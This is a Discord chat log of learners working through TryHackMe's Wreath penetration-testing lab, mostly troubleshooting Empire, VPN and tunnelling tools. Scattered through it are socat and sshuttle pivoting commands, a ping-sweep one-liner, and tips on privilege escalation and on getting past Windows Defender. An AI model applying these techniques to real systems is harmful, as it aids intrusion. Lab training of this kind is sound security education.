#wreath-network
I used curl to get it on prod
Well, you have a webpage rather than a binary
I'll try to redownload once I get my VM back up. It wanted to crash lol. Thanks!
Maybe wget'll work, but you've ended up with a webpage. Maybe your python server 404'd?
I'm not sure what the issue was. I don't know if it was trying to run the webpage, because it redownloaded as the same size.
But I redownloaded it and put in on prod-serv. Seems to be working now though
Thank you guys for the help! ❤️
Is there a way that I can port forward to the git server and from there use a proxy (or port forward) to reach the PC?
anyone know the syntax to delete a listener in empire? can't find the syntax anywhere, i tried kill but it says the listener is stopped
remove LISTENER
Huh. The command is in the room, I believe. Let's see
Oh, or not. Oops
Oh, you're trying to kill a listener?
Sorry -- thought we were talking agents
Yeah, it should be kill
ah I'm getting weird errors, it doesn't bother me anyway
How strange
yeah if you haven't noticed, computers always have a way of going wrong with me
yet it has always failed to stop me from computering
That's the spirit
Hey, I'm banging my head against the wall trying to get the bonus question of part 13 (encrypted relay or forward with socat). I always seem to get the E unknown device/address "openssl-listen" error. Any hint of what I should look for?
anyone familiar with the most recent version of starkiller? I'm using a version that is different from that in the network's tasks and trying to create an http_hop listener. where I specify my RedirectListener, instead of a dropbox or something, it's a text input and when I type the name of my listener, it doesn't create anything. thanks for your help
anyone else having issues with the powershell-empire listener crashing as soon as the stager connects? https://imgur.com/a/mT8Q0I7
my sshuttle is not working, so is there another way to do ??
is it because i am using wsl2??
okay
is there any other way to do so
??
but without that i can't run the 43777 exploit know??
you really should be using a VM
I'm sure there's probably some way around it, but the networking capabilities of WSL are severely lacking
Hi, can anyone explain to me what the '&' means in this one-liner? for i in {1..255}; do (ping -c 1 x.x.x.${i} | grep "bytes from" &); done
@hard mortar i was using VM but the drive was crashing again & again even after giving sufficient drive space
that's why
hi guys, I'm on task 13 (socat) of Wreath network
and I'm trying that bonus part at the end of it.
I'm not understanding that port part of it.
now for port forwarding (socat) it was like
./socat tcp-l:33060,fork,reuseaddr tcp:10.10.10.10:3306
target here is 10.10.10.10:3306
How long does it take for the network to start
@surreal sail it backgrounds the command inside the brackets, essentially executing all of the scans in parallel
@round tree maximum of 5 minutes
Thank you for extending the reset from 6 to 8
@lavish nest it's dynamic depending on how many people are in that instance of the network
ok
I just wanted to say thank you. It was a lot of fun! :)
ufff, whoami nt authority\system
I have finished "wreath", thanks for the challenge, I have learned a lot.
Thanks!
how to find the server side lang version on 3rd server
the extension is not giving me anything
Refresh the page? @humble lintel
I did multiple times
Try turning off the proxy and using it on something like Google?
Ok -- now turn the proxy back on and try it on .100?
I have done the port forward
2021/04/01 06:53:54 client: Connecting to ws://10.200.85.150:23456
2021/04/01 06:53:54 client: tun: proxy#8088=>10.200.85.100:80: Listening
2021/04/01 06:53:56 client: Connected (Latency 157.851067ms)
Ah, in that case there's no good reason for it to not have been finding the header
Try intercepting the request with Burpsuite and see if you can see the headers manually
GET / HTTP/1.1
Host: 127.0.0.1:8088
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: security_level=0; language=en; welcomebanner_status=dismiss; cookieconsent_status=dismiss; csrftoken=oqx69kfUatQhY0TKCK0J1x6SEa1w1d8X; sessionid=c62acf544b346c58c22680bccd2aab47; JSESSIONID.d7ed7594=node0acdj4ow8ras21bdbk0ei8kpab0.node0; JSESSIONID.a8e4d566=node01mrjxx1ee39frj4zb72gqbcly1.node0; screenResolution=1920x972
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sun, 08 Nov 2020 15:46:48 GMT
If-None-Match: "3dc7-5b39a5a80eecc"
Cache-Control: max-age=0
The response will be more useful
There you go
There's a version in there
Thanks a lot
Np
@merry robin finally got to reverse shelling the ||gitstack|| through ssh-tunneling the connection to attack machine. Gateway ports in sshd_config setting helped, great advice
Ayeeee, nice!
How big is Website.git ?
2.3 Mb
still need some help troubleshooting if anyone is up to it. I've followed the tasks and dark's videos to a T but everywhere on the starkiller UI, listeners, etc, it just says no data and I can't select anything, has anyone encountered this?
I would suggest asking the BC-Sec guys directly tbh @next imp
They're really good at keeping on top of bugs
alr
I've tried switching around a lot between the versions because I was having issues with getting my gitstack listener on empire-cli, it would always stop at stager 2, but the agent would be in red, you think you could help me out?
That sounds like the normal http_hop problem that's got a fix but doesn't seem to have hit the repo yet
ah
is it possible to continue the network without an agent on it? could i continue with just normal shell access?
Yep, it's designed that way
You can technically skip the entire Empire section and still finish the network just fine -- although the Empire stuff is really good to learn
cool cool thanks muir
OT: when fellow hackers use strong passwords for their admin accs
I think mine was password
I got a ||potato past the AV||.
Anyone else getting an Error 502 when trying to download the OVPN
@lyric bane just check that the AV is actually still on. I know it's been disabled a few times on various subnets.
Otherwise it'll just be the fact that Defender is mildly hopeless.
(Cross posting from #room-help )
Wreath -- (Hop) Shell dies right after I receive it. Did this happen with anyone?
Same in starkiller
https://media.discordapp.net/attachments/522158539129618453/827230618545946674/unknown.png
@normal sierra which subnet?
@scenic cargo it's a glitch in Empire that has a fix which has apparently not made it across to the main repo yet.
oh
I swear there's a note for this in the task
sheet, my bad. Let me go through it again, thanks!
@merry robin idk it just stays like that and when I download I get a 502
no probs, thanks!
@normal sierra show me your network map?
Leave and rejoin the room @normal sierra
still wont work
Did the 71 change to something else?
no I got placed back into 71
I tested defender by uploading a metasploit payload and a ||Juicy potato||. It quarantined both of them so assume its still working. So I ended up using || PrintSpoofer||.
Ah, yeah, printspoofer goes straight past defender -- it's hilarious
Like, try it on your host if that runs defender
I actually shut off defender through Group Policy because it quarantined my OSCP md notes and marked them as malicious. It gave me a huge scare when I woke up and saw that my notes vanished.
This is why you use Cherrytree
obsidian ftw
I haven't had time to mess around with it yet, but I'm 90% sure I can use Cherrytree as an AV bypass
its happened several times for me, smhmyh
I have so many payloads in my notebook that Defender goes nuts over if I extract out, but inside the SQLite DB Defender doesn't even notice
That combined with the fact you can execute programs from within cherrytree
@merry robin is there anything else I can try?
That's interesting. I'll do some research on that. So what word processor do you use to write your reports? Markdown just does a great job formatting code boxes.
How useful/effective is that? I haven't played with it much but didn't see a way to execute it and see the output
@limber rover could you possibly move ktndlly out of 71?
Cherrytree
I keep all my notes in a single cherrytree doc
so the OVPN isn't downloadable for that subnet?
That subnet doesn't actually exist
Oh, you can execute code boxes with F5, and embedded files by double clicking on them iirc
any way to see output from that, though? Like even just exit codes? I've tried that only a few times and didn't see any indicator that it ran, successfully or otherwise
this is just with code (python or shell) in code boxes, not embedded files. Never tried that
I think that will depend on the program. Try putting an input() (or something else blocking) at the end of the code box
It now works, thanks @merry robin and @limber rover
Thanks, James. I'll play around with it some more at some point. I always thought that was a major cool feature of CT, but haven't really used it at all
Thanks, downloaded and set up the old version, working fine!
@fervent obsidian would you be able to look into that? It doesn't seem to have hit the main Empire repo -- was the fix just pushed to the Kali apt repo?
do you know what line of code is causing that? I haven't gotten to that part of the room yet
Can I suggest something ?
I'm sure you're about to anyway @slow cove
I suggest James and Muiri make more awesome networks. That's my suggestion
Also, it's really throwing me off that you two switched avatars
facts
The room is FKIN AWESOME, like literally 0 things to talk about. Just a little suggestion: it will be a little better if you added a VM on the pivoting part because god damn, a lot of info to chunk in, that is it. Because I had to make my own lab and test on it
1337 XD
That's what the network is for though?
anything open. Doesn't really matter. Many people use 4444, 8888, 1337
YEP YEP, but you will forget the ways and so on until you reach task 17, so it will be a little better to practice directly once learning, then proceed, so we can make the things learned click
My plan is to come back after I've finished it and practice pivoting in different ways
I think it's pretty difficult to do that with a single VM, and there currently aren't many networks to practice with
yeah that's what I did I made a little lab and practiced pivoting before proceeding to task 17
Ideally you would use a common port (80, 443, 25, 53, etc)
other than that the room is damn insane 0 comments
Purely to bypass egress firewalls / IDS, etc
Yeah, not sure how to put anything else in there given it would have to be on the same network, but worth considering
Just out of curiosity, how did you make that? VMs on a local machine?
It says [*] If this is not the case, please check your IP and chosen port
If these are correct then there is likely a firewall preventing the reverse connection. Try choosing a well-known port such as 443 or 53
it has been the case with 1337 too
Download an UBUNTU machine, metasploitable, and your attacking machine (Kali in my case) and connect the ubuntu machine to 2 networks: the 1st network is the one that your attacking machine is connected to and the 2nd network is the one metasploitable is connected to, of course.
and like that that kali is not interacting with metasploitable
ubuntu is the middle man
@dry pendant
yeah trust me it's really good when it comes to beginners
Yeah. But man, I once had an AV which broke my pass-protected cherrytree. Cherry does create files in %temp% and when the AVs get hold of that, all kinds of weird stuff ensue. Mind you, it was the 0.3x version or something
Odd
Sadly, CT IS a bit buggy. I've had it crash numerous times. A friend had it crash and delete the entire folder the note database was in
Hey, I love ct, and use it every day, on multiple machines, work and personal
just saying- it has a few quirks
but considering it's a) free b) being written by one guy in his spare time, plus a few side contributors, I can't really complain
I'm very tempted to get involved and try contributing some stuff
I'd love to also, but there's never enough hours in the day. I used to contribute to open source a long time ago, but..... ⏱️
Yeah, same here. I practically used it instead of everything else.
Although, it taught me about the value of backups - the hard way :D
There was one year I had 2 or 3 major hard drive failures in the span of a month. Definitely caused me to invest in better backups
Yeaaaaah, my notes get pushed to github every 12 hours
I use macrium for system backups. It's saved me a couple times. Even good just for HD migrations
How long does Mimikatz usually take to load? I'm on task 21
It's loaded part way. But I can't type any commands. It's been about 5 minutes or so
Hmmm works with cmd. Powershell gives issues
same
rsync to get all folders (to sync) then push every 2 hours.
Does wreath have a certificate generator?
Unfortunately no
Its badge does though
It's badge?
It gives a badge when you finish it
badge can make a sort of cert
Yep. But then again, you have invoke mimikatz powershell script in powersploit, which worked fine last time I tried it
#infosec-general please

- Refresh the page and make sure the networks running
- You're connected to the Wreath Network VPN, right?
when i download the config file for wreath it's an html doc
What subnet are you in?
what do you mean? i'm not connected
Can you show me the network map?
i'm essentially stuck on task 2
The main repo is 30 days behind Kali since they get exclusive access. Everything should be hitting the main repo next week so they will be sync'd up again.
I need help. I have an active VPN to the Wreath Network and I can ping the 10.200.72.200 but I can't connect with the CVE 🥺 I work with a Kali on VMWare Workstation
just got 2 agents at Task 29. whole thing is astonishingly good
although, one thing confused me.
Both the reverse shell we received way back in task 19, and our evil-winrm access are already running in Powershell, so we would need to adapt the stager generated for us by Empire in order to use them. Instead, it is easier to use it with the webshell we originally used to compromise the machine
I got both agents from evil-winrm and webshell
evil-winrm gives me Git-SERV\Administrator since i login in as the admin
webshell gives me Workgroup\System
I used the same stager without adapting or any changes. It worked
How are you running the stager from evil-winrm?
copy the stager payload from starkiller. paste it and run
Odd -- that was throwing a bunch of errors for me in testing. I'll have a look into it again and see if evil-winrm has had a nice upgrade
yeah, i'm on the evil-winrm v2.4
ehm, the agent from evil-winrm not functional when running module.
the webshell one working as expected.
Your machine IP will be different from the example given
Not necessarily
Could you please screenshot your network map?
how do I do that?
Ok but I was just noticing that the ip differs so
See the top of the screen in the room where it shows you three machines?
Screenshot it
that
ohh ok
Let me know if the IPs don't change
ok now I have other IPs
Perfect
Download a new VPN connection pack then have fun!
ty
dev dev dev dev network
Just submitted a write up. What's the time frame for when they get reviewed and posted?
Whoop!
Hey, I just saw this. It says 9 days of access left. Is that for everyone or is it a personal timer? I wouldn't have joined the room right now if I knew it triggered a timer, lol
Right now I'm just reading them as they come in. They'll all be posted at the same time on or around the 7th when the competition ends
Is there a difference between the two links you submitted?
You can rejoin after that timer expires, it's just to conserve resources for people who aren't actively using the room
Will it reset anything I already had on the network?
You might be in a different subnet, in which case effectively yes
Guess I better hurry then haha
However, the network is set up specifically to have good breakpoints -- the SSH key and Admin hash
It's possible to get from no access to the third box in under 30 seconds on a new subnet
Easy enough! I'm on the Starkiller phase, so I think I can do it. Thanks for the response 
MrRobot user is in administrators and remote management group but I'm still getting this error
I'm on task 21 wreath
Are you running cmd as administrator?
oh i have to run cmd as administrator ok.
thanks man
No problem! Did that work?
I'm having some weird issues with empire on the gitserver
When I execute the stager I get an agent back
However, whenever I try to execute any commands or modules I don't get any responses back
and if I am in the CLI and I attempt to interact with the agent it tells me to enter a valid agent name even though I am sure I am entering the correct agent name
It's almost like it launches and then immediately dies.
Has anyone dealt with this before?
It's a little bug with Empire just now @stone ivy
There's a fix implemented -- just not quite hit the main repo yet
Alright, thanks
hey, i have a question. when i use sshuttle with the command ||sshuttle -r root@10.200.110.200 --ssh-cmd "ssh -i wreath_rsa" 200.110.200.0/24 -x 10.200.110.200|| it does not work. I use jobs after and it tells me that the process stopped. Can you help me out? If i try to access the webpage it loads till infinity
Do you get an error message when you first execute the command?
no, it's saying c : Connected to server.
I'm not sure offhand, then. I'm sure somebody else will chime in with an idea
i hope so hehe. btw. with ssh forwarding i have no problem but i would like to make it work with sshuttle
ok any idea what i am missing?
just open 2 terminals or something
run sshuttle in one term and another cmd in another
to access box 2/3 i forget
i want to access gitstack but connection always times out :/
hm
Are you pressing Ctrl + C after the connection completed message?
no, not at all
i put it in the foreground now and it seems to work but still timeout
And is that a copy/paste of the command you're using?
I would not background it if I were you
Because you're not forwarding the right subnet
oh yeah and that ^^
ok that could be it then ^^
oof
oops, sometimes it's too obvious. thanks a lot
Thanks, it's working now like a charm hehe
No, It should be the same link to my google drive. I'm not sure why it submitted twice.
I didn't include a resource section because every source is embedded when it's mentioned throughout the report.
All good. I'll delete the second link, so don't be alarmed when you get a rejection. The other one will still be there (and looks great)!
Thank you!
If there are any typos that made it past my spell check I'll be glad to resubmit with a fix.
>
Think you've mixed greater than up with less than there Cry
Holo has officially reached a higher task count than wreath so it is greater than
Not a higher task quality though.
And you have yet to have an original design idea
You also have quite literally double the number of machines to work with, so you need more than double the number of tasks before I'm impressed 🤷‍♂️
At least my ramblings make sense and are relevant
And a thick Invernessian accent
My accent is not thick! 
Should running just "curl.exe" in the PHP webshell return something? certutil.exe does, but curl.exe does not
and when I try to curl my copy of nc.exe nothing is hitting my webserver
I can run other commands, so I know my webshell is good
I tried hosting the web server on common and uncommon ports just in case it was a firewall issue
Shouldn't it be n^2? We're talking about a fully connected graph, right? ๐
actually it's 2^n, just to make it worst case. Exponents are fun.
big O can be a drag sometimes, eh?
I'm sorry if this is not the correct forum to ask, but i'm getting this message on Wreath room page. i thought this room will be available for some more time.
sorry, but rt(f)m, mate
Ok, what's that in plain English please.
read the manual
On the topic of CT as an AV bypass :-)))
Well that's irritating.
Bang goes that theory
Oh, but it didn't manage to quarantine?
Interesting
Because I left it open - but it crashes your DB anyway
on save it errors:
!! sqlite3_prepare_v2: no such table: codebox
I still can't get curl to work in task 40. I have my pivoting set up with sshuttle and chisel. I can run simple commands in the webshell such as "systeminfo" or "dir" however when I try to use curl nothing hits my webserver. I have tried plain text and url encoding and I have tried curl and curl.exe with no luck
I tried using the webshell to ping the address of my attack box and capture it with a tcpdump and I was not seeing any activity
Is there something I am doing wrong with the pivoting?
I also tried serving the file on the .200 machine and when I try to curl a file off it nothing happens either
Try encoding and sending powershell.exe -c "curl.exe -h" 2>&1
Should probably do it that way actually
Should the curl help menu show up in the browser?
Because I just executed it and nothing happened
Hi all - Anyone else having / had issues pulling the Website.git folder down using evil-WinRM? I can pull individual files (like HEAD) but if I try to pull the full dir I just get Error: Download failed. Check filenames or paths - I've tried with relative paths and absolute paths, but same difference
Check to make sure you have write access in the directory you're downloading to, or do:
download Website.git /tmp/Website.git to be sure
Are you issuing the command from the directory just above Website.git?
Yes, it should
Honestly not sure what's going on there. If you want to disconnect and DM me the config pack I can check manually, but you'll obviously have to get yourself back to that point
Yeah from within the repo dir I've tried relative. I've also tried full / absolute path - I have write access my side (been able to pull individual files from within the dir itself)
Can you screenshot your prompt?
By config pack you mean my VPN file?
Yeah
Disregard, turns out I'm just a massive idiot
for some reason I had quotes around my parameter in the URL
which was breaking it
Ah, yeah, that wouldn't help
Ah fixed it - Using a media device as my write point - Doesn't like : in the filename (the C:\etc)
Ah, faiiir
Thought I was going mental for a few minutes there and would have to go manually through - Had a similar issue trying to chmod a ssh key at one point 🤦‍♂️
Any issue going on with getting a stable empire agent?
i am getting this when i execute the starkiller stager script on the machine with both described ways... anyone know what's the problem?
kash@DESKTOP-7K6I4IF:~$ sudo gem install evil-winrm
sudo: gem: command not found
can someone help me
Install ruby
okay
i have a question. how can i access the website on the (10.200.86.100) pc
my proxy setting
on kali chisel
on 10.200.86.150 machine (evil-winrm)
i have done all but
btw I'm on task 33
Huh that looks like an issue between starkiller and the empire server which is odd. @fervent obsidian. Any ideas?
yeah i know, i use chisel from github for 10.200.86.150
for whatever reason the client is reporting 0.0.0-src
and apt install chisel for kali
ok
make sure you're always getting the latest release from github
but I'm using 1.7.6 version
the client isn't by the looks
it will work
ok
I'm a little confused on how to get socat onto the .200 machine. The static binaries at the github repo linked in the page don't actually contain binaries, just dockerfiles. Will running the static-binaries/socat/build.sh even be viable?
nevermind, I'm an idiot. I didn't see the binaries folder
has anyone done task 33 of wreath network (the part where you have to access the website running on the personal pc)
i haven't gotten that far
ok
I don't think empire can run with python 3.6 anymore. It should be 3.8+
I'm having trouble getting the reverse shell in task 20. I've created a socat relay on the .200 machine (I think?) and started a nc -lvnp 4444 listener on my attacking machine. Then I curl post'd the powershell code, but it fails to connect. Here are the commands and output I ran on the .200 machine: https://pastebin.com/AStZqZYJ
there's a typo in the ip in the powershell payload above (20. should be 10.). I fixed that, but still having the same problem/no connection. I've also tried executing the powershell command directly on the .150 using my pseudo-shell program I created (bonus challenge from a previous task). Nothing has worked so far, just the same interrupted system call/broken pipe error
my guess is that the socat command is not correct, but if that's wrong, I don't know what the proper syntax is
so I guess I must be doing the relay wrong, and would certainly appreciate any tips/insight there. But doing just a socat tcp-l listener on the .200 machine allowed me to forward the requests from the powershell payload and get a reverse shell from .150 back to my attacker machine
Guys, why is wreath telling me that I can't use it? It says resetting
I have used it a week ago but now not sure what's wrong
probably because enough users voted to reset it. Wait a few minutes and it should be back up. Might need to refresh the page
I did it says that since yesterday
verify your profile and post a screenshot of the top part of the page (the network graph and status)
!docs verify
I have deleted my VPN and tried to re-download it but it says wrong page
"it" meaning what? the vpn file download page? or the vpn file itself?
I don't know, I'm not sure where you're seeing that. Best I can suggest is to maybe try 1) leaving the wreath room 2) re-join the wreath room 3) download a new vpn file at the https://tryhackme.com/access page
When I click on download
But first I need to know why I can't download the vpn key
Leave the room and rejoin
I think that the 10.200.71 subnet is Muiri's dev/test network (might be wrong there, it might be .72?). I'd try leaving the room, maybe wait a few minutes, then try rejoining the room and generating a new vpn file
twilight zone net? Schrodinger net? Spooky
Well when I leave the room and return back to it it shows me that I'm still in the room with the 71 ip
@merry robin What's the fix for the haunted 71?
I don't know if it's an issue, but the windows server manager on .150 is showing that the amazon ssm agent service terminated unexpectedly and restarts... a lot
Neat ok
manually go into aws and nuke the subnet?
Nah -- it's the template the others are cloned from
71 or 72?
Because poor 71
is it possible to join the same subnet as somebody else? A friend and I were going to maybe experiment with the collaboration c2 features
No, but you don't need to be as long as the C2 server has access to an instance of the network
ahhh, neat. So even being in different subnets, we could still share that?
kash@DESKTOP-7K6I4IF:~$ sudo gem install evil-winrm
Building native extensions. This could take a while...
ERROR: Error installing evil-winrm:
ERROR: Failed to build gem native extension.
current directory: /var/lib/gems/2.7.0/gems/ffi-1.15.0/ext/ffi_c
/usr/bin/ruby2.7 -I /usr/lib/ruby/2.7.0 -r ./siteconf20210404-69-hnkb6.rb extconf.rb
mkmf.rb can't find header files for ruby at /usr/lib/ruby/include/ruby.h
You might have to install separate package for the ruby development
environment, ruby-dev or ruby-devel for example.
extconf failed, exit code 1
Gem files will remain installed in /var/lib/gems/2.7.0/gems/ffi-1.15.0 for inspection.
Results logged to /var/lib/gems/2.7.0/extensions/x86_64-linux/2.7.0/ffi-1.15.0/gem_make.out
Yep, as long as the C2 has access
can someone help
okay
Make yourself a kali VM. Will be much easier than carrying on with WSL2
Also, try to read error messages before asking here. Half the time they tell you exactly what to do.
i am using ubuntu
In windows?
okay @strange bison Thank you
As WSL?
WSL is pain for hacking. I highly recommend against it
empire seems to be stuck on the 'starting restful api' stage. Any thoughts why this might be?
when I load the page in the browser, I get the cert warning, but then just a blank page.
i can connect with starkiller though, that seems to be working
but I do get a 'failed to connect to socketIO' warning/error in starkiller
Is this intended in the AV evasion part? I just used exiftool, injected simple RCE oneliner, and, it's working on the server as well.
I think maybe this task was just to show PHP code's obfuscation.
@scenic cargo Defender is very erratic about whether or not it picks that bit up -- it caught it when I wrote the task, but the AV has been updated since then
Awesome, thanks! Yeah, AV is working, tried the msfvenom binary and it got deleted ASAP.
welp...wreath was very meh
Gotta love a good troll, dontcha
I think someone was trying to use a replay attack against my attack box on the wreath network....
i disconnected from the VPN to be safe
What makes you think that?
Tons of the following:
2021-04-03 14:19:49 TLS Error: incoming packet authentication failed from [AF_INET]52.213.119.176:1194
2021-04-03 14:20:05 Authenticate/Decrypt packet error: bad packet ID (may be a replay): [ #5 / time = (1617484775) 2021-04-03 14:19:35 ] -- see the man page entry for --no-replay and --replay-window for more info or silence this warning with --mute-replay-warnings
in my openvpn terminal
Not sure about relay attack, although the VPN doesn't seem happy
@strange bison is that one we're seeing just now?
hmmm?
VPN lots of packet auth errors
@limber rover you able to check the VPN logs for 93? Unusual error up there: #wreath-network message
Btw, just to help with the timestamps, I can confirm that I am Pacific Time zone, which matches the errors I received.
Completed Wreath, it was real fun.
Can't imagine the things the author might have learned while creating the room, the errors, the writing, the research.
I definitely learnt a lot! ❤️
congrats!
In terms of stealth/minimizing risk, which technique is preferred when pivoting/post-exploitation: static tools vs a tunnel/proxy? Going through the Wreath room ATM.
I'd recommend a combination of Chisel and SShuttle for Wreath
Detailed in the tasks ^
Oh you asked which is stealthier
Oh I'm going to be playing with all the techniques a lot. Was more curious from a discussion standpoint, outside of the contents of the room; If you wanted to minimize your personal risk when poking a large corp.
Static tools, so you're in and out.
Would you personally create a temp stash directory of static tools on a host, to help with cleanup?
Yeah, it's very situational. I am speaking from my own personal preference.
Others will have the opposite opinion, both work though.
Gotcha. Just trying to understand the ripples/waves my technological flailing about in the murky depths of networks cause
right there with ya on that one
Any fancy way of getting tools onto the box, or the good old python web server them over?
butterflies? https://xkcd.com/378/
Yeah, no argument here. What about a low-priv shell or windows?
Low priv, depends how low because you can usually get SSH with keys.
Windows? Certutil, InvokeWebRequest, or maybe smb?
do you generally try to make use of various "live off the land" utils?
whom, me? I'm still getting up to snuff on what can be done. Once I've gotten a better handle on that, I'll start looking at doing what needs to be done with LotL or Static binaries.
no, not you specifically, that was meant for anyone, but particularly for the most experienced folks
Definitely certutil gets picked up in logs/av now I think?
Like abusing certutil
https://lolbas-project.github.io/#/download - there's a whole lot of ways here
Butterflies is still better
I'm having some trouble on task 29. I've created two listeners: http with the host set to my attacker machine, http-hop with the IP set to the .200 machine. Different ports. I've opened the port for the http-hop on the firewall of the .200 machine. I copied the /hop folder to the .200 machine and started the php server to host it. I created the multi-launcher stager (powershell language) and copied the payload. I've then sent that payload to the .150 machine (both unencoded and base64 encoded), but I get a connection timeout error. Not sure what I did wrong/what step I skipped.
Sounds like your sshuttle might be down?
checking
yeah, I think it was down. Started it again, seems to be taking a little bit to reconnect though (testing to see if I can hit the .150 in browser) or send the powershell payload
Just check the network is still up
yeah, mine says 1h41m left
i'm still ssh'd into .200 and the php server is running, ss-tulwn shows my port is listening
Odd
yeah
I'm double checking my sshuttle command, but it looks okay. No agent coming back to starkiller though. Still waiting
oh, odd. I fg'd that process and I get a traceback
restarted it, web server hits instantly. gonna re-try the payload
payload was sent, but no agent is coming up in starkiller. Should that be immediate, or does that take a while?
I wonder if I am doing something wrong with the payload. If I send it unencoded, I get a powershell help back. If I send it base64 encoded, I get nothing back (empty string). This is through a web-shell.py I made as a bonus task a while back. The payload I'm sending is for the multi/launcher http-hop stager
would the path to the hop files on the .200 machine have anything to do with it? My dir structure is a little different than the examples
As long as the subdirectories are right, it should be Okay
my files are in /tmp/emptybuffer/hop/*
Try it with cURL directly?
As long as hop contains the directory structure that Empire/Starkiller created, and you're serving from that directory, it should be fine
cURL directly on what? Sending the b64 encoded payload to the .150 machine?
haven't tried that yet, will see what that does
okay, a new agent has appeared \o/
wonder why that was failing on my web-shell.py. It just does a request.post(url, data={'a' : command})
Maybe it gets truncated due to length?
No idea, but I've seen that before ¯\_(ツ)_/¯
iiiiinteresting. Now I'm curious then. To google I go
initial searches look like POST requests have no restriction on data length
not seeing anything useful so far. At some point I might pass it through wireshark and see if the post request is getting truncated or mangled by the python post.
if an agent is showing as red in starkiller, does that mean it can't connect? I'm not seeing errors elsewhere, but trying to execute the sherlock command is failing
yes. i guess you're using the agent from evil-winrm. that's caused the problem
no, I got this agent by a curl post from the .200 machine to the .150 machine with the encoded powershell payload
but the agent seems to be stale, no matter what I've tried. I can create a new agent, but can't do anything with it
nvm, download just slow. got successful now
even just trying to do a whoam through the agent status window doesn't seem to return anything. hm
weird tho. you probably already open up the port in the firewall for the hop-listener
yeah, on the .200 machine, the hop listener port is open
maybe just try update the Empire of kali
Note: Some versions of Empire don't do well at executing modules through agents received via Hop Listeners
it was updated as of a couple hours ago when I first downloaded it
even just trying to send a kill signal to the stale agent isn't working
I also tried opening the other port on the .200 machine (for the http listener to the attacking machine), but that doesn't seem to have any effect. Still can't communicate with the agents.
Yeah, I'm out of ideas. I'll see if I can figure it out tomorrow
I got the same problem as you @dry pendant, the agent dies immediately and becomes red, and I cannot kill it either. The problem may come from the newest version of Empire having some problems; you can try to downgrade it
Yeah, I haven't done that yet, might try today. But even more basic than executing modules, I couldn't even do a basic command through them- whoami, dir, etc. It's like the agent gets created but then never communicates back again. Or, the commands aren't able to get sent to the agent. Not sure.
Hey muir can i post the wreath video in #thm-community-media ? Since you said there should be a report but i only have the video
@ember solstice aye, go for it
Muiri, any guesses why my empire/starkiller agents always go stale? Did I skip something?
@merry robin Hehe thanks
@dry pendant sounds like the bug in Empire just now
There is a fix, but it's not in the main repo yet
ah, okay. SO either downgrade or find/pull the branch with the patch?
Downgrade might work
The branch with the patch is in the beta version of Empire though -- a private repo
so I might be better off just waiting a bit? Any rough wild guess as to how quickly that might get merged to prod? Or does empire even come into play after task 30? I didn't read ahead much, but it looked like the focus was on other tools
I'm not sure, to be honest. Soon, hopefully.
That said, you don't need Empire after that section. It's technically a standalone section
okay. I'll move forward then and then try to come back to the empire stuff
my first pass through the network is just kinda following directions/stumbling blindly. I want to come back and practice all the other pivoting methods until it becomes more second nature, but that'll be for another time
Sounds like a plan
reeallly loving this room, btw. Can't thank you enough for the time/effort that went into this
Learning a ton
Muiri did an amazing job with Wreath. 
Yep. The writeups do a good job of explaining the what/how, and introducing a lot of new topics. My todo/to-read/to-research list has grown immensely
Anybody having trouble connecting to the Administrator account with evil-winrm?
Just started the wreath network today
Enjoy!
My one complaint with wreath is that it made me drop below my 1:1 ratio of rooms:days-as-member :(. Gonna hafta work extra hard to fix that after I finish wreath
try to install it: pip install flask_socketio
If the pip install doesn't work then I recommend running it through kali apt install or poetry.
Which version?
hey guys are there any prerequisites for wreath network in terms of skill? Or can anyone start it?
Being familiar with Linux and common hacking terminology helps!
Check the empire room if you want to play more with empire
hey, i am solving wreath and this " error module request not found " is popping up again and again
VPN connected, reconnected, disconnected and connected again. No route to host.
refresh the room. check is the server really running? or down
It was still up, now time is finally over and I'm restarting it, thanks
i'm guessing you're having the wrong shebang line
mixed python2 and python3
thanks actually it was python payload issue solved now
yeah this one
can't download ||website.git|| with ||evil-winrm|| always get Error: Download failed. Check filenames or paths
I ended up making a zip file of that folder and downloaded that zip file
I think ||evil-winrm|| has problems downloading folders
It worked when I did it, it was a pain but it worked
yeah it worked for me too, what was your evil-winrm command?
it took a while to copy across for me I remember
Worked for me too. Can you share a screenshot?
All of my empire agents on git-serv are going stale, anybody having the same issues?
yep, empire has some fixes due that are not public yet.
Anybody having issue to connect? My connection ended and i can't reconnect to the host
make sure the network didn't go to sleep
or restart vpn
strange, i can connect to the website but i can't do a scan or run the webmin exploit
is your sshuttle connection up? I'm assuming you're talking about the website on .150?
I'm having problems making the chisel forward proxy. I've added 127.0.0.1 1337 to my /etc/proxychains4.conf and I'm starting chisel with "chisel client x.x.x.150:PORT_IN_WIN_FIREWALL 1337:socks, but I get an error back that the client cannot listen on 127.0.0.1:1337=>socks. Do I need to run it using proxychains?
did I perhaps not configure the proxychains4.conf correctly? I've tried with both strict and dynamic chain commented/uncommented
Actually i was starting with the .150. But the network went to sleep. After restarting i can't execute the webmin exploit, nor connect with sshuttle (i was connected before, but the same command didn't run again)
webmin exploit to .200 host
I think for most things between (roughly) steps 20-30, you'll need that sshuttle tunnel to the .150 machine running
Running this using proxychains gives me the same error
the server is already started/listening on the .150 machine (in an evil-winrm shell). I opened the port in the .150 firewall that I'm attempting to connect to
I've found the line of code in chisel that prints that error, but I'm not sure what's causing it. :/
I'm seeing some guides talk about doing a double tunnel with chisel- is that necessary in this case? Or is that over-complicating things?
okay, nevermind, looks like those errors were because my local port was in use. Switched to another port, chisel client on attacking machine seems to be running, but I didn't see a connect message on the .150 chisel server. Currently trying to figure out the foxyproxy config for this
Hm. So I think I have the foxyproxy config correct: ||socks5 type, address of 127.0.0.1 and port is 1338 (same as in my proxychains4.conf)||. But when I try to connect to any of .150, .100, or 127.0.0.1, at either ports 1338 or the port opened on the .150 machine, nothing works. With the exception of a "not found" blank page on .150:<open port>. Is that correct, or am I doing something stupid again?
normally I'd be thinking of doing a gobuster enumeration, but the writeup seems to indicate that I should be seeing a web page at this point
Only with sshuttle the page in .150 is already accessible
@acoustic mango Not sure I understand
if you set up sshuttle correctly on your machine, the page from the .150 will be accessible in your browser
The video of task 18 shows this situation
yeah, I'm past that point, eldruin. I'm on task 33, trying to connect to the next machine
Oh, sorry
no problem
I readily admit I probably did something stupid or overlooked something obvious. It's most likely a PEBCAK error :).
